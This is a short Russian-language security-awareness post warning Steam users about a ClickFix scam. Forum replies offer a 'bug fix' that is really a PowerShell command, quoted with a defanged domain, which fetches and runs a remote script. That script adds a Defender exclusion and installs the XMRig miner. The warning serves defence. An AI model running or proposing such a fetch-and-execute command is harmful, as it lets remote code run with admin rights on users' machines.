Как «проверенный фикс бага» со Steam-форумов превращает ваш компьютер в тихого майнера.

На форумах Steam мошенники отвечают на вопросы про вылеты, баги и пропавший лут и предлагают «быстрое решение»: открыть PowerShell от имени администратора и выполнить команду вида irm msfconfig[.]icu | iex. Звучит безобидно, но это классическая ClickFix‑атака: вас убеждают своими руками запустить вредонос.

Что делает команда: irm (Invoke‑RestMethod) скачивает скрипт с чужого сервера по указанному адресу; iex (Invoke‑Expression) сразу исполняет этот скрипт как код PowerShell.

Скрипт притворяется «оптимизатором Windows»: показывает фейковые уведомления про очистку кэша, обновление драйверов и проверку диска. В фоне он создаёт скрытую папку C:WindowsBackground, добавляет её в исключения Defender и скачивает туда криптомайнер XMRig.

Как не попасться: 🟢не копируйте и не запускайте команды PowerShell/Terminal/cmd из чужих советов на форумах, в чатах и комментариях; 🟢перед запуском любой непонятной команды гуглите, что она делает; 🟢не выключайте антивирус по советам сомнительных инструкций.

И пусть баги обходят вас стороной ✨

❕ Как «проверенный фикс бага» со Steam-форумов превращает ваш компьютер в тихого майнера | Сетка — социальная сеть от hh.ru